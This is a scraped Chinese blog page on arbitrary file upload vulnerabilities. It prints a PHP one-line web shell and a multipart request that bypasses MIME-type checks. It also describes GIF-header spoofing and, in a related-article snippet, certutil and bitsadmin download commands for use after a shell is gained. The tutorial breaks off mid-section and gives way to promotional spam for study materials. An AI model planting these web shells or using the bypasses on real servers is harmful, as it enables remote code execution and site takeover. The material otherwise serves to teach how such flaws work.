3、任意文件上传漏洞_任意文件上传漏洞条件,文末有彩蛋

最新推荐文章于 2024-05-29 11:08:48 发布
最新推荐文章于 2024-05-29 11:08:48 发布
阅读量840 收藏 21
点赞数 15
分类专栏: 2024年程序员学习 文章标签: 网络 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84159783/article/details/137550849
版权
<?php eval($_POST['1'])?>

  • 通过上传GetShell。对于服务器直接支持解析的文件格式,只需要上传该后缀的文件即可。这种
    情况下的漏洞也被称作任意文件上传。

  • 通过上传实现XSS攻击。上传HTML文件时,在其中插入XSS代码实现XSS攻击。

  • 通过上传实现服务器拒绝服务。上传超大文件,或当服务器自动执行解压操作时,上传畸形的压
    缩包文件实现拒绝服务。

文件上传+环境解析 = WebShell
文件上传+任意路径控制 = 文件覆盖(WebShell)
文件上传 - 环境解析 - 路径控制 = XSS
文件上传-环境解析+无大小限制=拒绝服务

3、漏洞绕过

文件类型限制:

<?php if($_FILES['a']['type'] != "image/gif") { die("Sorry,we only allow uploading GIF images"); } ?>

绕过:

------WebKitFormBoundaryU1lrzLiplUyRrlHJ
Content-Disposition: form-data; name=“a”; filename=“filename.php”
Content-Type: text/php image/gif
file_content <?php eval($_GET['a'])?>
------WebKitFormBoundaryU1lrzLiplUyRrlHJ

文件头限制:

<?php $finfo = finfo_open(FILEINFO_MIME_TYPE); $filename = '1.php'; echo finfo_file($finfo,$filename); ?>

绕过:

添加一个GIF(也就是可以上传到服务器上的文件类型)的文件头就可以。

47494638 39613804 A005F700 00000000 | GIF89a8
0509080A 09050B0C 0B120E0D 0E0F100F |
11101211 0E131313 1A151316 16191719 |

文件后缀追加限制:

<?php var_dump($_POST['a']); var_dump($_FILES); move_uploaded_file($_FILES["a"]["tmp_name"],"./upload" .$_POST['a'].'.jpg'); ?>

绕过:

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

e4f6bb3bff17885655014.png#pic_center)

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-PMcyCJyh-1712643866210)]

2401_84159783
关注
专栏目录
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)
qq_51577576的博客
03-13 1003
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268) 在ImageMagick 7.1.0-51版本及以前存在CVE-2022-44268漏洞。 ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像(例如,调整大小)时,生成的图像可能嵌入了任意远程文件的内容(如果ImageMagick二进制文件有权读取它)。
[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798
qq_51577576的博客
09-02 1967
[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana存在任意文件读取漏洞未授权的攻击者利用该漏洞,能够获取服务器敏感文件。...
php审计--任意文件上传配合目录文件包含getshell
qq_29437513的博客
08-10 530
在黑盒中 源码 数据库配置文件都是很不好找的,,但源码审计不同 所有的漏洞,成因都是相同的,但我们自以最基础的作为代表, 这里文件上传这个点可以配合文件包含一块利用,当某个站对数据处理不严时,存在sql注入,那也可能会有文件注入, 常见的文件目录穿越配合文件包含实现getshell 演示目录穿越的原理,这里通过readfile函数读取文件,注意file变量里有个正斜杆 <?php if(isset($_GET['file'])){ readfile("file/".$_GET['file'])
·xss文件上传漏洞
2302_80280669的博客
03-12 1063
补充知识:php 在 window 的时候如果文件名+"::$DATA"会把::$DATA 之后的数据当成文件流处理, 不会检测后缀名,且保持"::$DATA"之前的文件名 他的目的就是不检查后缀名。补充知识:php 在 window 的时候如果文件名+"::$DATA"会把::$DATA 之后的数据当成文件流处理, 不会检测后缀名,且保持"::$DATA"之前的文件名名可以改成 1.php::$DAT。//删除文件名末尾的点 在没有这类型函数的情况下,我们可以在文件名后加.绕过黑名单。
WEB漏洞——命令执行,文件上传,XSS漏洞
wj193165zl的博客
07-19 807
命令执行漏洞是指攻击者可以随意执行系统命令。属于高危漏洞之一,任何脚本语言都可以调用操作系统命令。 再业务本身,有的需要提交数据给业务,如果没有对用户的提交的数据进行判断的话,那很有可能会被用来执行命令。 在PHP中,有的函数,如system,exec,shell_exec,passthru,popen,proc_popen。当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中...
UEditor 任意文件上传漏洞
zkaqlaoniao的博客
04-09 3175
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
任意文件上传getshell
Websec
03-21 8833
漏洞描述:任意文件上传顾名思义就是在文件上传的地方能够上传任意类型的文件,我们可以上传恶意木马文件对其服务器进行攻击。漏洞寻找:通过查看文件上传的地方,通过burpsuite抓包分析其上传点对其文件类型是否做了限制,也可能只是做了前端限制,但是这个都不要紧,直接绕过就行漏洞修复建议:1.文件上传的地方,我们需要对其文件格式做白名单限制,只允许我们需要的文件进行上传即可2.对文件格式进行校验,前端以...
任意文件上传漏洞
gaomei2009的专栏
08-24 2333
任意文件上传漏洞
文件上传漏洞
frinck的博客
09-18 307
文件上传漏洞 1.简介 文件上传漏洞就是说用户上传了一个可以执行的脚本文件,并通过这个文件拿到了执行服务器端命令的能力,正常情况下上传功能是一个正常业务需求,对于网站来说,很多时候确实需要用户将文件上传服务器中,但是由于往回走那对上传部分控制不足或者存在缺陷,从而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件。 1.1 漏洞成因 web脚本语言: 上传文件时web脚本语言,服务器...
[ vulhub漏洞复现篇 ] ActiveMQ任意文件写入漏洞CVE-2016-3088
qq_51577576的博客
09-18 1266
[ vulhub漏洞复现篇 ] ActiveMQ任意文件写入漏洞CVE-2016-3088 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。
[ vulhub漏洞复现篇 ] Apache Flink 文件上传漏洞 (CVE-2020-17518)
qq_51577576的博客
09-05 2235
[ vulhub漏洞复现篇 ] Apache Flink 文件上传漏洞 (CVE-2020-17518) Apache Flink是一个面向数据流处理和批量数据处理的可分布式的开源计算框架。它可以用来做批处理,即处理静态的数据集、历史的数据集;也可以用来做流处理,即实时地处理一些实时数据流,实时地产生数据的结果;也可以用来做一些基于事件的应用;该漏洞允许攻击者利用REST API,并通过精心构造的HTTP Header,实现远程文件写入。
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(五)文件上传相关面试题
qq_51577576的博客
11-30 1550
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(五)文件上传相关面试题 渗透方向的岗位,涉及到的知识点是很广泛的。 这里我总结了整个一系列的面试题,可能没有覆盖到全部的知识面,但是应该是比较全面的,本文主讲解web漏洞文件上传方向的面试题。 如果整个系列的问题搞懂了大部分,那找个网安方向的工作基本上没什么问题了。 当然了,可能也不是说这些问题都会被问到,但这些题目都是和网安岗位相契合的。
任意文件上传漏洞挖掘(getshell)
huangyongkang666的博客
11-27 352
SRC任意文件上传漏洞挖掘(getshell)
php代码审计-OurPhp 后台任意文件上传getshell
weixin_44747030的博客
10-27 500
OurPhp代码审计
PHPYUN任意文件上传导致GETSHELL
_404root的博客
02-28 1857
简要描述: 简单到你难以想象,只要网站还可以注册就可以GETSHELL,无视GPC,无视WAF。4.1beta版本,其他版本未测 详细说明: 1.在审计PHPYUN的时候一度对PHPYUN的WAF非常无语,但是在大家都痴迷于寻找SQL注入漏洞的时候,确实忽略了一个很简单的上传漏洞。首先定位到漏洞文件wap/member/model/index.class.php function photo_ac...
漏洞学习——任意文件上传】四川外国语大学某分站任意文件上传导致getshell
Fly_鹏程万里
02-22 684
漏洞细节 fck编辑器存在地址:http://**.**.**.**:8080/include/fckeditor/editor/filemanager/upload/test.html 上传文件时可在文件名后加空格进行绕过上传 getshell 修复建议:增加白名单检测绕过 参见:https://bugs.shuimugan.com/bug/view?bug_no=15406...
某教程学习笔记(一):19、任意文件上传和sql语句拿shell
weixin_41489908的博客
03-08 425
毕业时,门卫大爷收走了那辆自行车,问我都那么破了,还拍照干什么,他哪里知道后座上曾坐过陪了我四年的姑娘。。。 ---- 网易云热评 一、任意上传文件拿shell 1、注册账号 2、上传头像 3、上传任意文件,抓包分析 将tx后面的内容修改为tx=data%3Aimage%2Fphp%3Bbase64%2CPD9waHANCiBwaHBpbmZvKCk7IA0KPz4%3D 解密收的内容为:...
任意文件上传
来日可期的博客
08-29 3532
任意文件上传漏洞(Arbitrary File Upload Vulnerability)是指攻击者通过某种方式绕过服务器端对上传文件类型和路径的合法性检查,成功地上传恶意文件到目标服务器上,并执行其中的恶意代码。这种漏洞广泛存在于许多Web应用程序中,特别是那些允许用户上传文件的网站或Web应用。
windows系统getshell后上传文件
最新发布
arr的博客
05-29 216
bitsadmin /transfer myDownloadJob /download /priority normal https://xxx.com/temp.zip C:\xxx\wwwroot\xxx\xxx\inst\temp\temp.zipcertutil -urlcache -split -f https://xxx.com/html.zip C:\xxx\wwwroot\xxx\xxx\xxx\acticle\temp.ziptar -xf C:\xxx\wwwroot\xxx\xxx\i
MATLAB绘制一个3d的椭圆彩蛋
06-03
好的,以下是在MATLAB中绘制3D椭圆彩蛋的代码: ```matlab % 设置绘图参数 theta = linspace(0, 2*pi, 1000); a = 50; b = 80; c = 30; x = a*cos(theta); y = b*sin(theta); z = c*sqrt(1 - (x.^2/a^2) - (y.^2/b^...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值